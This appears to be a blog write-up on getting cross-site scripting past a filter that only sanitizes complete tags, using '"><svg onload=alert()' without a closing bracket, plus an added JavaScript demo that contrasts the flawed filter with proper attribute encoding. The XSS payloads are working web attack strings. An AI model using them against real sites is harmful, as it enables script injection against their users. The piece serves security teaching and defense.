XSS Bypass Closing Tag ">" Filtered


This time I continue the previous findings with some of my own opinions and reference findings 🙂

Response code snippet:

<h1 test="x" value="[INPUT]">

From the response above, it can be seen that the client input lands inside the value attribute.

Let's start with a first payload:

1. "><svg onload=alert()>

If you enter the payload above, then the response will be:

<h1 test="x" value="["><svg onload=alert()>]">

With that payload the XSS is triggered, but it's not that easy when you find XSS on a big site: they will surely sanitize your input. I took a sample of the response to that input after sanitization:

<h1 test="x" value="[&quot;&gt;]">

Look, why does it become &quot;&gt;?

Yes, it is sanitized, because there is potential HTML in it: with value="[INPUT]", if you add "><tag>, the tag is stripped and your remaining input ( "><> ) is sanitized to &quot;&gt;

Then what is the solution?

2. "><svg onload=alert()

Surely you ask: why this payload?
Isn't it the same as number 1?
Let's look at the response to this input:

<h1 test="x" value="["><svg onload=alert()]">

See, not sanitized 🙂

Why is it not sanitized?

Look again: the tag you entered has no greater-than sign. Back to my previous explanation: the input is only sanitized if it contains potential HTML, that is, a complete tag.

As far as the filter is concerned, there is no potential HTML in the client input, right?

And see, you get the XSS here 🙂
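To make the point concrete, here is an added example in JavaScript (my own code, not from this post or from PortSwigger): a model of the "only sanitize when a complete tag is present" filter the post describes, beside a proper HTML attribute encoder, both applied to the post's template <h1 test="x" value="[INPUT]">. The function names, the regex used to model the filter, and the tag-count check are my assumptions, not anything observed on the real site.

```javascript
// Added example (not code from the original post). Models the sanitizer the
// post describes and contrasts it with contextual attribute encoding.
// The page template is the post's: <h1 test="x" value="[INPUT]">
const TEMPLATE_PREFIX = '<h1 test="x" value="[';
const TEMPLATE_SUFFIX = ']">';

// Assumed model of the post's filter: it only acts when the input contains
// "potential HTML", i.e. a complete <tag>. Such tags are stripped and the
// leftover quote and angle brackets are encoded. Input whose tag has no
// closing ">" does not match, so it passes through untouched.
function naiveFilter(input) {
  if (!/<[^>]*>/.test(input)) {
    return input; // nothing that looks like a complete tag, nothing is touched
  }
  return input
    .replace(/<[^>]*>/g, '')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Contextual output encoding for a double-quoted HTML attribute: every
// character with a meaning in that context is encoded, whether or not the
// input "looks like" a tag. The fix is encoding by context, not a better
// pattern match.
function encodeAttr(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Builds the page fragment with the chosen filter applied to the input.
function render(input, filter) {
  return TEMPLATE_PREFIX + filter(input) + TEMPLATE_SUFFIX;
}

// Crude regression check (my own): the template opens exactly one tag (<h1>),
// so any extra tag start means the input escaped the attribute value.
function countTagStarts(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Constructed sample inputs: payloads 1 and 2 from the post.
const PAYLOAD_WITH_GT = '"><svg onload=alert()>';
const PAYLOAD_WITHOUT_GT = '"><svg onload=alert()';

// Stand-alone demonstration: prints how each filter handles each payload.
function demo() {
  const filters = [['naiveFilter', naiveFilter], ['encodeAttr', encodeAttr]];
  for (const payload of [PAYLOAD_WITH_GT, PAYLOAD_WITHOUT_GT]) {
    for (const [name, filter] of filters) {
      const html = render(payload, filter);
      const verdict = countTagStarts(html) > 1 ? 'BROKEN OUT' : 'contained ';
      console.log(`${name.padEnd(11)} ${verdict} ${html}`);
    }
  }
}
demo();
```

Running it shows the naive filter turning payload 1 into &quot;&gt; (as in the post) while passing payload 2 through so that the response contains a second tag, and the attribute encoder producing a single-tag response for both payloads. The lesson for the defender is that "detect HTML, then escape" is the wrong shape of check; encoding every quote and angle bracket that reaches an attribute value removes the distinction the bypass relies on.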

There is an interesting thing I got from the reference by the PortSwigger team, namely XSS without a greater-than sign.

References:

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Here's a snippet:

<h1>

"><svg onload=alert()

</h1>

XSS triggered